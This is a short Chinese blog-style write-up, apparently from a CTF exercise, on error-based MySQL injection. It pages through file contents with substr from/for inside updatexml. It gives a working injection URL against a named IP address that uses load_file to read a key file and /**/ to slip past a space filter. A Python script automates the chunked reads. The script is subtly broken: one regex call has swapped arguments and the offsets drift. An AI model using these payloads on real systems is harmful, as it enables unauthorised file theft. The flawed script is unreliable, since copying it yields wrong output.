SQL注入文件读取通过from for分页读取

http://103.238.227.13:10088/?id=1

在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下，看到别人使用from for说实在此前真不知道这操作。

先来看一下from for吧

 mysql> select database();
 +------------+
 | database() |
 +------------+
 | typecho    |
 +------------+
 1 row in set (0.00 sec)

 mysql> select substr(database() from 1 for 2);
 +---------------------------------+
 | substr(database() from 1 for 2) |
 +---------------------------------+
 | ty                              |
 +---------------------------------+
 1 row in set (0.00 sec)

 mysql> select substr(database() from 2 for 3);
 +---------------------------------+
 | substr(database() from 2 for 3) |
 +---------------------------------+
 | ype                             |
 +---------------------------------+
 1 row in set (0.00 sec)
#说明前面一个数字是从第几个开始读取，最后的一个数字是读取的长度。

大概懂了吧，就是起到一个分页的效果。

那么再用到注入里自然就OK了。

PS:过滤了空格可以用使用/**/进行替换，还有就是updatexml最多只能显示32位的长度，所以for的数字是32。

http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/1/**/for/**/32)),1),1)

然后写一个脚本吧from后面的数字每次+32,for也要加就可以了。

以下脚本待完善。

 #!/usr/bin/env python
 #encoding:utf-8
 #by i3ekr

 import requests,re
 from lxml import etree
 n1 = 1
 n2 = 32

 for i in range(0,100):
     url ="""
 http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/%d/**/for/**/%d)),1),1)
     """%(n1,n2)
     html = requests.get(url,timeout=5).text
     print(html)
     result=re.findall(html,"[A-Z][0-9][A-Z][0-9]")
     result = re.findall("[A-Z][0-9][A-Z][0-9]{29}",html)
     print(result)
     n1+=31
     n2+=32